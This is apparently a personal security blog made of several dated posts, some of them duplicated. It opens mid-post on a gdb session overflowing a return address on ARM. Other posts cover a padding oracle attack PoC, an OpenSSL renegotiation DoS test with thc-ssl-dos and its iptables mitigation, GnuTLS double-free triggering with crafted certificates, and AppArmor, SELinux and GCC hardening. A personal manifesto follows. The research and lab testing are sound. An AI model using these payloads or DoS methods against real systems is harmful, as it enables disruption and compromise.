Program terminated with signal SIGILL, Illegal instruction.
The program no longer exists.
Did you see this? +1 with the fuc_me()'s addr, plz.....
(gdb) r `python -c 'print "A" * 16 + "\x35\x84"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/shawn/citypw-SCFE/security/overwrite_ret_addr_armv7/victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
Breakpoint 1, test (input=0x7efff90f 'A'
11 strcpy(buf, input);
(gdb) c
Continuing.
AAAAAAAAAAAAAAAA5�
being hacked
Program received signal SIGSEGV, Segmentation fault.
0x00008432 in test (input=
13 }
It worked! So, the exp should be like:
shawn@debian-armhf:~/citypw-SCFE/security/overwrite_ret_addr_armv7$ ./victim `python -c 'print "A" * 16 + "\x35\x84"'`
The address of func test(): 0x8405, func fuck_me(): 0x8435
AAAAAAAAAAAAAAAA5�
being hacked
Segmentation fault
===========================
I guess the exploit of ARM would be much different to x86. I've heard of ret2libc won't work on ARM. That's really interesting and worth to figure it out. Obviously, this Phrack paper and some manuals should be added into my must-read list.
Thursday, October 17, 2013
RTL-SDR version of "Hello World"
Telco sec is always a fascinating field I want to get involve with. Why? Because those old school Phrack guys has playing both computer sec and telco sec. I missed the golden age of Phrack that was bothered me for a while. It won't stop me to dive into any field I want now. If what makes you tick is only for profit( money?), come on, you probably won't be having qualify to mention the term "underground spirit";-)
About 1 month ago, a friend( Can't list his/her name here-_-) sent me a slide about Femtocell hacking and asked if I may have interest in it. Of course, I have. But...well, there's always a fucking "but", isn't it?...femtocell is a little bit expensive and I was busy with other stuff at the time. Then I even forgot this shit until a great hacker( Can't list his/her name too-_-) mentioned about there are cheap devices I could buy some for learning telco stuff: RTL-SDR. Everything you need to know is already in this website. I bought tuner, antenna, freq counter, SMA-MCX converter,etc... then I was catching the shit in the air. FM at first, MODE-S transmission and GSM sniffing. What I have learned/done in past two weeks is really shocking my mind and it is definitely actived a bunch of neurons in my brain. This is an awesome field. I'm willing to keep up with it in the future. Hacking on GNU/Linux system calls and kernel are already a burden that's hard to carry on. Hope I can make it this time.............I really appreciate those who were/are contributed/contributing to Phrack. It's more than a technical ezine. It's about hacking spirit and philosophical ideas.
Freq counter, it probably could be detecting IR-based controller
Support EFF....
About 1 month ago, a friend( Can't list his/her name here-_-) sent me a slide about Femtocell hacking and asked if I may have interest in it. Of course, I have. But...well, there's always a fucking "but", isn't it?...femtocell is a little bit expensive and I was busy with other stuff at the time. Then I even forgot this shit until a great hacker( Can't list his/her name too-_-) mentioned about there are cheap devices I could buy some for learning telco stuff: RTL-SDR. Everything you need to know is already in this website. I bought tuner, antenna, freq counter, SMA-MCX converter,etc... then I was catching the shit in the air. FM at first, MODE-S transmission and GSM sniffing. What I have learned/done in past two weeks is really shocking my mind and it is definitely actived a bunch of neurons in my brain. This is an awesome field. I'm willing to keep up with it in the future. Hacking on GNU/Linux system calls and kernel are already a burden that's hard to carry on. Hope I can make it this time.............I really appreciate those who were/are contributed/contributing to Phrack. It's more than a technical ezine. It's about hacking spirit and philosophical ideas.
Freq counter, it probably could be detecting IR-based controller
Catching the shit in the air( not the wire)
Wednesday, May 22, 2013
How to Hardening your own program in GNU/Linux
Platform: OpenSUSE 12.3
Apparmor is a implementation of confinement technology. It could help you prevent those unknown attacks like 0-day vulnerability. In OpenSUSE/Ubuntu, it's very easy to install it. For the case in openSUSE 12.3, type "yast2" in terminal or use GUI software management can install the apparmor. Once you install the apparmor, you need to make the profile for the program what you want to be hardened.
Firstly, please download the example files here. Then compile the program:
shawn@linux-sk8j:~> gcc apparmor_test.c
Generate the profile for your program:
shawn@linux-sk8j:~> sudo /usr/sbin/genprof a.out
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
.........................................
.........................................
.........................................
Finished generating profile for /home/shawn/a.out.
-----------------------------------------------------------
Then you can find the profile in /etc/apparmor.d/home.shawn.a.out. Add a few of lines into it like this:
#include
/home/shawn/a.out {
#include
/home/shawn/a.out mr,
/home/shawn/hello r,
/home/shawn/world w,
network stream,
}
Because apparmor is using whitelist-like policy in default. The above example means: only allows this program( a.out) have the read permission on file /home/shawn/hello, the write permission on file /home/shawn/world and the tcp connection. If this program have a stack-based buffer overflow issue, the attacker might want to spawn the shell by exploit it. In this case, this not gonna be happened. For further reading about apparmor profile, you might be interested in this article. Other similar implementation like SELinux and Grsecurity/PaX could achieve the same goal. SELinux is the most powerful one but the most difficult to use.
When you done the confinment hardening, there are a lot of mitigation technology you should consider. It's much easier to use. Please keep this in mind: these defensive technology are what we called "mitigation", which means the skilled hackers or attackers having the ability to exploit it. It's only the matter of time.
GCC options:
------------------------------------------------
Stack canary:
-fstack-protector, only some functions being protected
-fstack-protector-all, protect every functions in your program
Bypass method, please check Scraps of notes on remote stack overflow exploitation in Phrack Issue 67.
Heap( malloc() corruption check):
default since glibc 2.5. Please use the latest version of glibc.
Position-Independent-Executable:
-pie, it would use the advantage of ASLR which provided by kernel. Remember turn on your ASLR:
Bypass method, please check Bypassing PaX ASLR protection in Phrack Issue 59. Yes, it's an old paper but it's still worth to read.
GOT memory corruption attack hardening of ELF binaries:
-z relro, Partial RELRO
-z relro -z now, Full RELRO
Bypass method, please check The Art Of ELF: Analysis and Exploitations
String Vulnerability mitigation:
-FORTIFY_SOURCE, mitigate string format vuln
Bypass method, please check A Eulogy for Format Strings in Phrack Issue 67.
Non-executable stack:
-z nostack
Well, there are a lot of ways to bypass it.
I also made a list a few months ago. You may want to check it too. Yes, there are a lot of mitigation tech and a lot of bypass tech. Offensive and defensive technologies are like brothers. The only matter is they will fight each other to the end of the world;-)
btw: You don't need to worry about the performance hit when you turn on these mitigation tech except -fstack-protector-all. That's it!
May L0rd's hacking spirit guide us!!!
Apparmor is a implementation of confinement technology. It could help you prevent those unknown attacks like 0-day vulnerability. In OpenSUSE/Ubuntu, it's very easy to install it. For the case in openSUSE 12.3, type "yast2" in terminal or use GUI software management can install the apparmor. Once you install the apparmor, you need to make the profile for the program what you want to be hardened.
Firstly, please download the example files here. Then compile the program:
shawn@linux-sk8j:~> gcc apparmor_test.c
Generate the profile for your program:
shawn@linux-sk8j:~> sudo /usr/sbin/genprof a.out
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
.........................................
.........................................
.........................................
Finished generating profile for /home/shawn/a.out.
-----------------------------------------------------------
Then you can find the profile in /etc/apparmor.d/home.shawn.a.out. Add a few of lines into it like this:
#include
/home/shawn/a.out {
#include
/home/shawn/a.out mr,
/home/shawn/hello r,
/home/shawn/world w,
network stream,
}
Because apparmor is using whitelist-like policy in default. The above example means: only allows this program( a.out) have the read permission on file /home/shawn/hello, the write permission on file /home/shawn/world and the tcp connection. If this program have a stack-based buffer overflow issue, the attacker might want to spawn the shell by exploit it. In this case, this not gonna be happened. For further reading about apparmor profile, you might be interested in this article. Other similar implementation like SELinux and Grsecurity/PaX could achieve the same goal. SELinux is the most powerful one but the most difficult to use.
When you done the confinment hardening, there are a lot of mitigation technology you should consider. It's much easier to use. Please keep this in mind: these defensive technology are what we called "mitigation", which means the skilled hackers or attackers having the ability to exploit it. It's only the matter of time.
GCC options:
------------------------------------------------
Stack canary:
-fstack-protector, only some functions being protected
-fstack-protector-all, protect every functions in your program
Bypass method, please check Scraps of notes on remote stack overflow exploitation in Phrack Issue 67.
Heap( malloc() corruption check):
default since glibc 2.5. Please use the latest version of glibc.
Position-Independent-Executable:
-pie, it would use the advantage of ASLR which provided by kernel. Remember turn on your ASLR:
Bypass method, please check Bypassing PaX ASLR protection in Phrack Issue 59. Yes, it's an old paper but it's still worth to read.
GOT memory corruption attack hardening of ELF binaries:
-z relro, Partial RELRO
-z relro -z now, Full RELRO
Bypass method, please check The Art Of ELF: Analysis and Exploitations
String Vulnerability mitigation:
-FORTIFY_SOURCE, mitigate string format vuln
Bypass method, please check A Eulogy for Format Strings in Phrack Issue 67.
Non-executable stack:
-z nostack
Well, there are a lot of ways to bypass it.
I also made a list a few months ago. You may want to check it too. Yes, there are a lot of mitigation tech and a lot of bypass tech. Offensive and defensive technologies are like brothers. The only matter is they will fight each other to the end of the world;-)
btw: You don't need to worry about the performance hit when you turn on these mitigation tech except -fstack-protector-all. That's it!
May L0rd's hacking spirit guide us!!!
Friday, April 26, 2013
Padding Oracle Attack PoC in C
I'm a newbie on crypto field. *Unfortunately*, I need to deal with some open source security stuff( openssl and gnutls) in my day job. Yes, don't be so sad for me;-) I can handle it so far. I need to know more knowledge about crypto. The best way to do it is writing xxx-attack PoC. Then I've heard of Lucky-13 is something. Backport these patches from upstream drives me crazy. Dude, you known~ 13 openssl upstream commits( more than 1,700 loc modifies) were only for fix one security issue what called Lucky-13 Thirteen which was disclosured in Feb 2013. It was my honor to do this shitload work with very very low salary;-) After I finished it, a very serious question came out of my mind: What if another tens of shitload work pop up in the future but with no help from the upstream community? Well...I have to eat the rocket by my own hands. F0r preparing to handle such situation, I need to know the detail of the attack. That's why I wrote the padding oracle attack PoC( Download here). I googled "padding oracle attack". I found 3 guys wrote their own padding oracle attack PoC/tools in 3 differnt languages: perl, ruby and python. I looked their code and articles. They guys are awesome! Brian Holyfield( Perl guy) wrote this very good article and more importantly it's easy to understand: http://blog.gdssecurity.com/labs/2010/9/14/automated-padding-oracle-attacks-with-padbuster.html Daoge( python one) is a CHiense hacker who are good at web security: http://hi.baidu.com/aullik5/item/49ab45de982a67db251f40f6 Ron Bowes( Ruby guy) gave us a great presentation at Shmoocon 2013. I really thank his practical advice. He wrote two articles about padding oracle attack. The 1st one introduce the principle and the 2nd is giving an great example. http://www.skullsecurity.org/blog/2013/padding-oracle-attacks-in-depth http://www.skullsecurity.org/blog/2013/a-padding-oracle-example Well, I'm a kind of old school guy. I decided write it in C( not old enough as asm). This example is simple: shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ make gcc -g -o padding_oracle_attack_poc padding_oracle_attack_poc.c -lcrypto done shawn@shawn-fortress /arsenal-4-sec-testing/libcrypto/lucky-what $ ./padding_oracle_attack_poc Ciphertext is 16 bytes: 83e10d51e6d122ca3faf089c7a924a7b Decrypting now 205 is done: 00000000000000ce3faf089c7a924a7b 36 is done: 00000000000025cd3faf089c7a924a7b 214 is done: 0000000000d724cc3faf089c7a924a7b 230 is done: 00000000e7d023cb3faf089c7a924a7b 80 is done: 00000051e6d122ca3faf089c7a924a7b 110 is done: 00006f52e5d221c93faf089c7a924a7b 137 is done: 008a6e53e4d320c83faf089c7a924a7b 248 is done: f985615cebdc2fc73faf089c7a924a7b The original plaintext is: "Hello World" The one last block of plaintext: 726c6405050505050000000000000000 ----> rld
btw: Thanks to Thomas Biege again..who is guiding me in not only one sec field...
Wednesday, April 17, 2013
How to enable SELinux in SLES 11 SP2
I've been playing with SELinux for a few days. Once you decide to hack on SELinux, which means a very long hacking journey is begin. The 1st shit you need to do is to enable the SELinux before you dive into the details. Yes, you may already knew these great stuff could help your great SELinux hacking journey:
1, SELinux project wiki
2, The SELinux Notebook - The Foundations - 3rd Edition
The SELinux kernel module has already compiled in SUSE Linux Enterprise Server 11 SP2 but without any specific polices. OK then, I've bullshit a lot, haven't I? Please allow me bullshit a lot more;-)
Firstly, make sure SELS 11 SP2 is working well:
--------------------------------------------------------------------------------
shawn-fortress:~ # cat /etc/issue
Welcome to SUSE Linux Enterprise Server 11 SP2 (i586) - Kernel \r (\l).
--------------------------------------------------------------------------------
Install these packages which are needed for SELinux:
--------------------------------------------------------------------------------
zypper in libselinux1 checkpolicy libsemanage1 policycoreutils
--------------------------------------------------------------------------------
Type "yast2 bootloader" in cmdline and add:
--------------------------------------------------------------------------------
"security=selinux selinux=1 enforcing=0" into the kernel cmdline
--------------------------------------------------------------------------------
In GRUB bootloader, these above 3 options are used related to SELinux.
* security=selinux, tells the kernel to use SELinux and not AppArmor
* selinux=1, switches on SELinux
* enforcing=0, puts SELinux in permissive mode( only logging)
Install selinux-tools, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-tools
--------------------------------------------------------------------------------
Install selinux-policy, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-policy
--------------------------------------------------------------------------------
Add selinux to existing PAM config file:
--------------------------------------------------------------------------------
pam-config -a --selinux
--------------------------------------------------------------------------------
set restorecond service to runlevel 3 in "expert mode":
--------------------------------------------------------------------------------
yast2 runlevel
--------------------------------------------------------------------------------
Finally, reboot your computer/laptop/s*!@#...... and check the SELinux status:
shawn-fortress:~ # sestatus
SELinux status: enabled
SELinuxfs mount: /selinux
Current mode: permissive
Mode from config file: permissive
Policy version: 26
Policy from config file: refpolicy-standard
See, it's working!
Thanks to Thomas Biege who is guiding me on this journey! Thomas's article "SELinux on openSUSE 11.1" helped me to understand the config of SELinux in big picture.
May L0rd's hacking spirit guide us!
1, SELinux project wiki
2, The SELinux Notebook - The Foundations - 3rd Edition
The SELinux kernel module has already compiled in SUSE Linux Enterprise Server 11 SP2 but without any specific polices. OK then, I've bullshit a lot, haven't I? Please allow me bullshit a lot more;-)
Firstly, make sure SELS 11 SP2 is working well:
--------------------------------------------------------------------------------
shawn-fortress:~ # cat /etc/issue
Welcome to SUSE Linux Enterprise Server 11 SP2 (i586) - Kernel \r (\l).
--------------------------------------------------------------------------------
Install these packages which are needed for SELinux:
--------------------------------------------------------------------------------
zypper in libselinux1 checkpolicy libsemanage1 policycoreutils
--------------------------------------------------------------------------------
Type "yast2 bootloader" in cmdline and add:
--------------------------------------------------------------------------------
"security=selinux selinux=1 enforcing=0" into the kernel cmdline
--------------------------------------------------------------------------------
In GRUB bootloader, these above 3 options are used related to SELinux.
* security=selinux, tells the kernel to use SELinux and not AppArmor
* selinux=1, switches on SELinux
* enforcing=0, puts SELinux in permissive mode( only logging)
Install selinux-tools, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-tools
--------------------------------------------------------------------------------
Install selinux-policy, choose "SUSE SLE-11 SP2", then "1 Click Install":
--------------------------------------------------------------------------------
http://software.opensuse.org/package/selinux-policy
--------------------------------------------------------------------------------
Add selinux to existing PAM config file:
--------------------------------------------------------------------------------
pam-config -a --selinux
--------------------------------------------------------------------------------
set restorecond service to runlevel 3 in "expert mode":
--------------------------------------------------------------------------------
yast2 runlevel
--------------------------------------------------------------------------------
Finally, reboot your computer/laptop/s*!@#...... and check the SELinux status:
shawn-fortress:~ # sestatus
SELinux status: enabled
SELinuxfs mount: /selinux
Current mode: permissive
Mode from config file: permissive
Policy version: 26
Policy from config file: refpolicy-standard
See, it's working!
Thanks to Thomas Biege who is guiding me on this journey! Thomas's article "SELinux on openSUSE 11.1" helped me to understand the config of SELinux in big picture.
May L0rd's hacking spirit guide us!
Monday, April 01, 2013
Vuln assessment for PALADIN forensic tools free version
I went to the China Mac Forensic Conference last week. This was my 1st time I attended a security con about forensic. Some of security guys gave us a few free speech and it's all about forensic. In forenisc field, the only stuff I've know its Lynis which was written by Michael Boelen. They were talking about forensic stuff on Mac/iOS platforms in the morning. That made me a little boring. But what else can I blame about? This conference is called Mac-Forensic*. Fortunately, I found something very interesting at the afternoon. A company named SUMURI providing a forensic solution which based on GNU/Linux. This GNU/Linux distro is called "PALADIN". I got a free Live-DVD and booted it up in scene. Well, I was fuc* exicting because I got tens of shitloads of information about Mac/iOS in that day. Now I had something I'm familiar with: GNU/Linux. I found some potential risks for PALADIN GNU/Linux distro. I've already notified them. Hope they could spend more time on sec stuff.
OK. When PALADIN booted up, you can see the ubuntu-like( Unity?) GUI:
PALADIN provides a lot of open source forensic tools:
In the free version, the only closed-tool is "PALADIN Toolbox" which can be found in the Desktop and the binary file is located in /usr/bin/toolbox. This binary is using many free/open source libraries. The 1st potential issue is violation of free/open source licenses. Then I asked Steve Whalen "are you sure that toolbox has no violation of the free/open source licenses" in the scene. His answer is pretty sure that the toolbox won't be violated any free/open source licenses:
Then, I took a few mins to investigation on the binary. Firstly, the entry address:
And, it doesn't have any anti-debugging features( my examples) in it. If your asset is a closed-source binary. You should do anti-debug. A skilled reverse engineer is able to find the security issue by reversing the binary in very *short* time:
ASLR is turned on. "2" is very good, which means the kernel do the randomize for stack and heap separately. AFAIK, the issue is the ASLR only work with PIE.
Lucky Thirteen Attack is a big issue recently. The current openssl version is affected.
Well, this is it. I've done the investigation when a guy told me it's time to smb break. I'm very happy to see the company like SUMURI brings GNU/Linux into the forensic field.
OK. When PALADIN booted up, you can see the ubuntu-like( Unity?) GUI:
PALADIN provides a lot of open source forensic tools:
In the free version, the only closed-tool is "PALADIN Toolbox" which can be found in the Desktop and the binary file is located in /usr/bin/toolbox. This binary is using many free/open source libraries. The 1st potential issue is violation of free/open source licenses. Then I asked Steve Whalen "are you sure that toolbox has no violation of the free/open source licenses" in the scene. His answer is pretty sure that the toolbox won't be violated any free/open source licenses:
Then, I took a few mins to investigation on the binary. Firstly, the entry address:
And, it doesn't have any anti-debugging features( my examples) in it. If your asset is a closed-source binary. You should do anti-debug. A skilled reverse engineer is able to find the security issue by reversing the binary in very *short* time:
ASLR is turned on. "2" is very good, which means the kernel do the randomize for stack and heap separately. AFAIK, the issue is the ASLR only work with PIE.
Lucky Thirteen Attack is a big issue recently. The current openssl version is affected.
Well, this is it. I've done the investigation when a guy told me it's time to smb break. I'm very happy to see the company like SUMURI brings GNU/Linux into the forensic field.
Thursday, March 28, 2013
Openssl renegotiation DoS attack is still an issue
Openssl renegotiate would causes DoS attack was disclosured in 2011,then THC released their DoS attack tools. This issue what we called CVE-2011-1473 until now the openssl upstream community doesn't give any solution. So, it seems they've been leaving this issue to the application developers( suck this shit in mind), such as Apache2 provide a optional config that you can disable renegotiation.
Let's see what Apache2 server would do in most cases:
shawn@fortress / $ openssl s_client -connect build.opensuse.org:443
..............................
..............................
Timeout : 300 (sec)
Verify return code: 20 (unable to get local issuer certificate) ---
R // Press R, then enter
RENEGOTIATING 140722018514592:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:592:
According to Vincent Bernat, a server will require 15 times the processing power of a client, which means an Intel i7 CPU laptop can kick a bunch of servers's ass. Plz take a look at my test data:
Test environment:SLES 11 SP2 , assigned 2 cores + 1GB memory in virtual machine
Case I:
Server: openssl s_server -key server-key.pem
Client: thc-ssl-dos 192.168.0.1 4433 --accept -l 10000
The worst case:
Cpu0 : 1.3%us, 1.7%sy, 0.0%ni, 97.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Cpu1 : 53.1%us, 5.1%sy, 0.0%ni, 37.1%id, 0.0%wa, 0.0%hi, 0.7%si, 0.0%st
Case II: Vincent Bernat provided us an open source hardening/mitigation solution, which add some rate-limit/fixed hex data for filtering on the netfilter.
#sh iptables.sh
#iptables -A INPUT -d 192.168.0.1 -p tcp --dport 4433 -j LIMIT_RENEGOCIATION
Server: openssl s_server -key server-key.pem
Client: thc-ssl-dos 192.168.0.1 4433 --accept -l 10000
The worst case:
Cpu0 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Cpu1 : 0.0%us, 0.7%sy, 0.0%ni, 99.3%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Well done, Vincent! Your solution works. But I'm not sure this may cause the side-effect. Vincent added some fixed hex data as filtering policy on the netfilter. What if the same hex data occurs? Is false positive possible?
Let's see what Apache2 server would do in most cases:
shawn@fortress / $ openssl s_client -connect build.opensuse.org:443
..............................
..............................
Timeout : 300 (sec)
Verify return code: 20 (unable to get local issuer certificate) ---
R // Press R, then enter
RENEGOTIATING 140722018514592:error:1409E0E5:SSL routines:SSL3_WRITE_BYTES:ssl handshake failure:s3_pkt.c:592:
According to Vincent Bernat, a server will require 15 times the processing power of a client, which means an Intel i7 CPU laptop can kick a bunch of servers's ass. Plz take a look at my test data:
Test environment:SLES 11 SP2 , assigned 2 cores + 1GB memory in virtual machine
Case I:
Server: openssl s_server -key server-key.pem
Client: thc-ssl-dos 192.168.0.1 4433 --accept -l 10000
The worst case:
Cpu0 : 1.3%us, 1.7%sy, 0.0%ni, 97.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Cpu1 : 53.1%us, 5.1%sy, 0.0%ni, 37.1%id, 0.0%wa, 0.0%hi, 0.7%si, 0.0%st
Case II: Vincent Bernat provided us an open source hardening/mitigation solution, which add some rate-limit/fixed hex data for filtering on the netfilter.
#sh iptables.sh
#iptables -A INPUT -d 192.168.0.1 -p tcp --dport 4433 -j LIMIT_RENEGOCIATION
Server: openssl s_server -key server-key.pem
Client: thc-ssl-dos 192.168.0.1 4433 --accept -l 10000
The worst case:
Cpu0 : 0.0%us, 0.0%sy, 0.0%ni,100.0%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Cpu1 : 0.0%us, 0.7%sy, 0.0%ni, 99.3%id, 0.0%wa, 0.0%hi, 0.0%si, 0.0%st
Well done, Vincent! Your solution works. But I'm not sure this may cause the side-effect. Vincent added some fixed hex data as filtering policy on the netfilter. What if the same hex data occurs? Is false positive possible?
Wednesday, March 20, 2013
possible ways to exploit CVE-2012-1663
CVE-2013-1663 is a possible remote DOS attack issue. This issue has
been fixed in >=GNUTLS-3.0.14. I hacked on it for hours and figure out
a few prerequisites could make it vulnerable:
=============================
REQUIRED:
- prior to GNUTLS 3.0.14
- crafted certificate
=============================
Attacking SCENES
- a client import a crafted cert file for sending req to server( CA?)
- a "server" import a crafted cert file for sending req to other
server( CA?)
---> With high frequency uses above manipulations
Stand on the client side, the attacker should try to construct a
crafted certificate for triggering the below function fails:
ret = gnutls_pubkey_import_x509(pcert->pubkey, crt, 0);
if (ret < 0)
{
gnutls_pubkey_deinit(pcert->pubkey);
/* pcert->pubkey should be NULL now */
ret = gnutls_assert_val(ret);
goto cleanup;
}
I made up two crafted cert files( client.pem, client2.pem) seems would
trigger the double free issue in client's side.
Warning: Don't try it on your host machine because it would cost too
much memory then makes your machine very slow. I highly recommend you guys use vm for testing.
shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./ex-serv-x509
processing server set to null?
Server ready. Listening to port '5556'.
shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./attack.sh
................
.................
...................
Another terminal: killall client
Test platform: Slackware 13.37 + GNUTLS-3.0.13
been fixed in >=GNUTLS-3.0.14. I hacked on it for hours and figure out
a few prerequisites could make it vulnerable:
=============================
REQUIRED:
- prior to GNUTLS 3.0.14
- crafted certificate
=============================
Attacking SCENES
- a client import a crafted cert file for sending req to server( CA?)
- a "server" import a crafted cert file for sending req to other
server( CA?)
---> With high frequency uses above manipulations
Stand on the client side, the attacker should try to construct a
crafted certificate for triggering the below function fails:
ret = gnutls_pubkey_import_x509(pcert->pubkey, crt, 0);
if (ret < 0)
{
gnutls_pubkey_deinit(pcert->pubkey);
/* pcert->pubkey should be NULL now */
ret = gnutls_assert_val(ret);
goto cleanup;
}
I made up two crafted cert files( client.pem, client2.pem) seems would
trigger the double free issue in client's side.
Warning: Don't try it on your host machine because it would cost too
much memory then makes your machine very slow. I highly recommend you guys use vm for testing.
shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./ex-serv-x509
processing server set to null?
Server ready. Listening to port '5556'.
shawn@sl13:~/gnutls_compile_uses/CVE-2012-1663$ ./attack.sh
................
.................
...................
Another terminal: killall client
Test platform: Slackware 13.37 + GNUTLS-3.0.13
Sunday, October 21, 2012
My story - The falling of Hackerfellowship Group
Where should I begin? The story I'm going to share, that's definitely
a long story. I will make it short as possible as I could.
I became a christian in 2004. Then the following years I was reading/learning a lot of stuff about other people's consequence of ideas. In late 2007, after 3 years of thinking, I thought I was still lacking of "aha" ideas. There were more conversations in face-2-face back then. I sponsored a community to get a group of people together to discussion on some topics. HFG( Hackerfellowship Group) was born in 2007. We have had monthly meeting for 5 years. We also had a lot of discussions on mailinglist. People came and went. A lot of things happened. I tried to build HFG as an organic community but I totally failed. I neglected the most important factor in the organic community: People must already have organic life, hacker's life. I expected HFG could have the spirit of underground community but it never did. Because these guys I was hacking with who were not hackers even didn't understand what hacker ethic is. Nalaginrut/fU9ANg/口水猫/....you are not fucking hackers! How could people get used to talking about hacker ethic without any experience of underground scenes? Indeed, I was inspired by Phrack. That's why I ended HFG in my life journey. I'm becoming more like a security guy but not as a generic hacker. I shut down the mailing list and set it open for public. Someday in the future, will I be back? I don't know. Anything is possible if I really want to.
Don't give me wrong. Some of former HFG members are still my good friends. Unfortunately, only friends without brotherhood tag. I built my own fundamentally structure of philosophy with the experiences in HFG. Unfortunately again, it was only my philosophy, it always be. I finally decided to release the latest version of HFG manifesto on my blog last month. I hope it could help people who are struggling with sort of philosophic ideas. But I'm not sure if it really could be helpful. I just do what I should do. I know people would like to hear a happy ending. I'm so sorry, did I fuck your mind again? You fuc*ing tell me...
btw: Internet is a incredible system. No one gives a shit about who you are or what you believed in internet. What internet care is only about ideas. V is right about the ideas are immortality. No one can destroy the ideas.
-----------------------------------------------------------------------------------------------------
HFG( Hackerfellowship Group) manifesto alpha-end revised version
what is Fellowship?
In ancient Greece, the fellowship means a group of guys who are hacking together for achieving the same goal. The HackerFellowship will get hackers together for conversation/sharing/hacking. Hackers are always living in the future, and making the definition of the future!
What is our goal?
Hacking, find the truth! Because Hackers want/need truth. Hackers must experience sort of underground scenes. We are trying to build an underground online/offline community to help us digging deeper, which behind the surface. Hacking on 4-layer model of Theo/Philo/Math/Engi with inevitable complexity of this world...
I want to join in, but how?
Wait a min, my dear friend. We wish you could be one of us just like a brother(maybe you are a sister) return home. We all know that choose the strong philosophy is our only option. In the whole eco-system( Sunday school->brotherhood->community->start-up->company->Multi-regional corporation), building a brotherhood is our target. Once you get in, you must share some views/knowledge. Keep that in mind: what we are really concerning it's about your own philosophy, and we need you prove that you have these abilities or background below to contribute:
1, Join in a conversations like a philosopher who lived in ancient Greece.
2, If you are come from computer field, you should have basis computer programming skills either in C(think about the way of Turing Machine) or scheme(think about the way of Lambda calculus). And having the ability to make your own personal world view on computing field.
3, If you are atheist, we only accept those real atheist( like Ray Kurzweil?) who are looking for the truth whatever it costs. If you are not type of them, fuck outta of here.
4, If you are a christian, only the reformed faith(Lutheranism,Calvinist,neo-Calvinist,etc) are welcome in HFG! Because we need a christian who is willing to dedicate to cultural mandate( defined by reformed theology) in his/her hacking field.
Why HFG?
There may be dozen of reasons. We only list some highlighted ones:
1, We are type of people who are following the hacker ethic and focus on the purpose of life. Even we don't know the purpose or our position in this specific era. We are still trying to figure it out.
2, The brotherhood is like the 2nd foundation never existed. Wait...Where the hell is the 1st foundation? Do you get it? Join HFG, which means you have a chance to learn/hack on how to build an underground brotherhood.
3, Not all of us are comes from computer fields. A lot of people did really good job at non-computer field that we called them Generic hacker. Hacker ethic now affecting more places than our thought. We are hackers! We are anonymous! We have different hacking background. But we are sharing the same methodologies.
We suggest you could learn these courses on MIT OCW:
1, Structure and Interpretation of Computer Programs
2, Introduction to Computer Science and Programming( python)
3, Operating System Engineering
4, Computer Language Engineering
5, Practical Programming in C
6, Multicore Programming Primer
Techique topic:
1, Lisp interpreter
2, GNU/Linux
3, Open hardware
Some materials are our friendly arsenal:
------------------------------------------------------------------------------------------
The Holy Bible - SOMEONE
------------------------------------------------------------------------------------------
Hacker, Hacker, Hacker!!!
------------------------------------------------------------------------------------------
Hacker Ethics and the Spirit of the Information Age by Pekka Hiemann
Hackers: Heroes of the Computer Revolution by Steven Levy
Masters of Doom: How Two Guys Created an Empire and Transformed Pop Culture - David Kushner
Hackers and Painters: Big Ideas from the Computer Age by Paul Graham
The Art of Intrusion - Kevin Mitnick
------------------------------------------------------------------------------------------
Ideas - Theological philosphy & Philosophical theology
------------------------------------------------------------------------------------------
The Institution of Christian Religion - John Cavlin
Redeeming Science - Vern Sheridan Poythress
The Silmarillion -
The trilogy of The Lord of the Rings -
The Protestant Ethic and the Spirit of Capitalism - Max Webber
The Consequences of Ideas: Understanding the Concepts that Shaped Our World - R. C. Sproul
Making Sense of It All Pascal and the Meaning of Life - Thomas V. Morris
Worldview: The History of a Concept - David K. Naugle
Augustine's Confessions - St.Augestine
The Great Philosophers - Karl Theodor Jaspers
Truth or Consequences: The Promise & Perils of Postmodernism - Millard J. Erickson
Twilight of the Idols - Friedrich Nietzsche
The Will to Power - Friedrich Nietzsche
Philosophical Fragments - Soren Aabye Kierkegaard
Interview with the Vampire - Anne Rice
The Vampire Lestat - Anne Rice
My Life: A Spoken Autobiography - Fidel Castro
Man, his nature and place in the world - Arnold Gehlen
Wild at heart - John Eldredge
Mathematics in Western Culture - Morris Kline
Metaphysics - Aristotle
Nine Talmudic Readings - Emmanuel Levinas
Mere Christianity - C. S. Lewis
On the Trinity - St.Augestine
Thoughts - Blaise Pascal
A History of Western Philosophy - Bertrand Russell
On Judaism - Martin Buber
Shadows of the Mind: A Search for the Missing Science of Consciousness - Roger Penrose
God in Search of Man : A Philosophy of Judaism - AJB
Essence of Judaism - Leo Baeck
Everyman's Talmud - Abraham Cohen
The Matrix and Philosophy: Welcome to the Desert of the Real - William Irwin
Start-up Nation: The Story of Israel's Economic Miracle - Saul Singer
Out of Control: The New Biology of Machines, Social Systems, and the Economic World - KK
What Technology Wants - KK
When Science Meets Religion: Enemies, Strangers, or Partners? - Ian G. Barbour
Foundation Series by Isaac Asimov
English Deism: Its Roots And Its Fruits - John Orr
The Singularity is near - Ray Kurzweil
Complexity: The Emerging Science at the Edge of Order and Chaos - M. Mitchell Waldrop
